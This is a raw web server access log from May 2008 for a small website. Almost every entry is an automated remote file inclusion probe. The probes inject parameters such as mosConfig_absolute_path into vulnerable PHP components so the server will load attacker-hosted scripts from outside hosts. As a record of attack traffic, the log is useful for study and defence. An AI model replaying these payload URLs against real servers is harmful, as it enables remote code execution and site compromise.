207.44.134.122 - - [25/May/2008:18:26:08 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "neighborhoodglimpses.com"
207.44.134.122 - - [25/May/2008:18:26:09 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "neighborhoodglimpses.com"
190.54.49.157 - - [25/May/2008:18:26:20 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.neighborhoodglimpses.com"
190.54.49.157 - - [25/May/2008:18:26:20 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.neighborhoodglimpses.com"
207.44.134.122 - - [25/May/2008:18:26:47 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "neighborhoodglimpses.com"
207.44.134.122 - - [25/May/2008:18:26:47 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "neighborhoodglimpses.com"
207.44.134.122 - - [25/May/2008:18:27:27 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
207.44.134.122 - - [25/May/2008:18:27:27 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
207.44.134.122 - - [25/May/2008:18:28:05 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "neighborhoodglimpses.com"
207.44.134.122 - - [25/May/2008:18:28:05 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "neighborhoodglimpses.com"
207.44.134.122 - - [25/May/2008:18:28:44 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "neighborhoodglimpses.com"
207.44.134.122 - - [25/May/2008:18:28:44 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "neighborhoodglimpses.com"
80.82.115.21 - - [25/May/2008:18:31:03 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "neighborhoodglimpses.com"
80.82.115.21 - - [25/May/2008:18:31:04 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "neighborhoodglimpses.com"
80.67.23.140 - - [25/May/2008:18:36:30 -0700] "GET /index.php?sourcedir=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
80.67.23.140 - - [25/May/2008:18:36:30 -0700] "GET /logs/index.php?sourcedir=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
80.67.23.140 - - [25/May/2008:18:36:30 -0700] "GET /logs/access.log/index.php?sourcedir=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
80.67.23.140 - - [25/May/2008:18:36:31 -0700] "GET /logs/access_080211.log/index.php?sourcedir=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "neighborhoodglimpses.com"
80.67.23.140 - - [25/May/2008:18:36:31 -0700] "GET /index.php?sourcedir=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "neighborhoodglimpses.com"
80.67.23.140 - - [25/May/2008:18:36:31 -0700] "GET /logs/index.php?sourcedir=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "neighborhoodglimpses.com"
85.17.3.183 - - [25/May/2008:18:41:36 -0700] "GET //ashnews.php?pathtoashnews=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
69.0.211.58 - - [25/May/2008:18:42:14 -0700] "GET /logs/access_080211.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "neighborhoodglimpses.com"
69.0.211.58 - - [25/May/2008:18:42:14 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "neighborhoodglimpses.com"
69.0.211.58 - - [25/May/2008:18:42:14 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "neighborhoodglimpses.com"
74.55.53.226 - - [25/May/2008:18:43:53 -0700] "GET /logs/access.log//common/db.php?commonpath=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.55.53.226 - - [25/May/2008:18:43:53 -0700] "GET //common/db.php?commonpath=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.55.53.226 - - [25/May/2008:18:43:54 -0700] "GET /logs//common/db.php?commonpath=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
163.28.32.100 - - [25/May/2008:18:44:10 -0700] "GET /logs/index.php?sourcedir=http://scaneru.nm.ru/idv.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
163.28.32.100 - - [25/May/2008:18:44:10 -0700] "GET /index.php?sourcedir=http://scaneru.nm.ru/idv.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
163.28.32.100 - - [25/May/2008:18:44:10 -0700] "GET /logs/access.log/index.php?sourcedir=http://scaneru.nm.ru/idv.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
74.55.53.226 - - [25/May/2008:18:46:54 -0700] "GET //common/db.php?commonpath=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
163.28.32.100 - - [25/May/2008:18:48:59 -0700] "GET /logs/access_080211.log/index.php?sourcedir=http://scaneru.nm.ru/idv.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
163.28.32.100 - - [25/May/2008:18:48:59 -0700] "GET /index.php?sourcedir=http://scaneru.nm.ru/idv.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
163.28.32.100 - - [25/May/2008:18:48:59 -0700] "GET /logs/index.php?sourcedir=http://scaneru.nm.ru/idv.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:18:55:08 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:18:59:13 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dj.caucasus.net/id11.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:18:59:13 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dj.caucasus.net/id11.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:18:59:14 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dj.caucasus.net/id11.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:18:59:37 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://singspiration.org//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:18:59:38 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://singspiration.org//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:18:59:38 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://singspiration.org//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:19:02:37 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:19:02:40 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:19:06:15 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/mid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:19:06:15 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/mid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:19:06:15 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/mid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
67.195.37.94 - - [25/May/2008:19:07:45 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "neighborhoodglimpses.com"
70.85.192.194 - - [25/May/2008:19:11:25 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [25/May/2008:19:11:25 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [25/May/2008:19:11:25 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [25/May/2008:19:11:25 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [25/May/2008:19:11:25 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [25/May/2008:19:11:25 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.15.48.60 - - [25/May/2008:19:11:36 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
67.15.48.60 - - [25/May/2008:19:11:36 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
208.116.44.60 - - [25/May/2008:19:12:46 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
208.116.44.60 - - [25/May/2008:19:12:46 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
208.116.44.60 - - [25/May/2008:19:12:46 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:19:14:36 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:19:14:37 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:19:16:24 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:19:16:25 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:19:16:37 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [25/May/2008:19:16:37 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
216.75.35.118 - - [25/May/2008:19:20:46 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://pigsofwar.com/images/banners/inc.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.75.35.118 - - [25/May/2008:19:20:46 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://pigsofwar.com/images/banners/inc.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.75.35.118 - - [25/May/2008:19:20:46 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://pigsofwar.com/images/banners/inc.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:19:22:18 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
84.243.253.159 - - [25/May/2008:19:24:12 -0700] "GET /logs/middle.php?file=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
84.243.253.159 - - [25/May/2008:19:24:12 -0700] "GET /middle.php?file=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
89.106.96.182 - - [25/May/2008:19:25:59 -0700] "GET /logs/access.log/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
89.106.96.182 - - [25/May/2008:19:26:00 -0700] "GET /index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
89.106.96.182 - - [25/May/2008:19:26:00 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:19:27:16 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:19:27:16 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:19:27:16 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
85.17.3.183 - - [25/May/2008:19:27:47 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
66.7.206.59 - - [25/May/2008:19:29:13 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.7.206.59 - - [25/May/2008:19:29:13 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.7.206.59 - - [25/May/2008:19:29:13 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
60.48.98.54 - - [25/May/2008:19:29:15 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "www.neighborhoodglimpses.com"
89.106.96.182 - - [25/May/2008:19:32:17 -0700] "GET /logs/access_080211.log/?GALLERY_BASEDIR=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
89.106.96.182 - - [25/May/2008:19:32:17 -0700] "GET /?GALLERY_BASEDIR=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
89.106.96.182 - - [25/May/2008:19:32:18 -0700] "GET /logs/?GALLERY_BASEDIR=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 6515 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.55.53.226 - - [25/May/2008:19:34:44 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.55.53.226 - - [25/May/2008:19:34:44 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:19:35:36 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:19:35:37 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:19:35:47 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:19:35:47 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:19:35:47 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:19:35:47 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
77.92.85.12 - - [25/May/2008:19:37:09 -0700] "GET /avatar.php?page=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "neighborhoodglimpses.com"
77.92.85.12 - - [25/May/2008:19:37:09 -0700] "GET /avatar.php?page=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.neighborhoodglimpses.com"
77.92.85.12 - - [25/May/2008:19:37:10 -0700] "GET /logs/avatar.php?page=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "neighborhoodglimpses.com"
77.92.85.12 - - [25/May/2008:19:37:10 -0700] "GET /logs/avatar.php?page=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.neighborhoodglimpses.com"
66.7.206.59 - - [25/May/2008:19:37:16 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.7.206.59 - - [25/May/2008:19:37:17 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:19:45:12 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:19:45:25 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:19:45:27 -0700] "GET /logs/access_080211.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:19:45:27 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:19:45:27 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:19:45:41 -0700] "GET /logs/access_080211.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:19:45:41 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
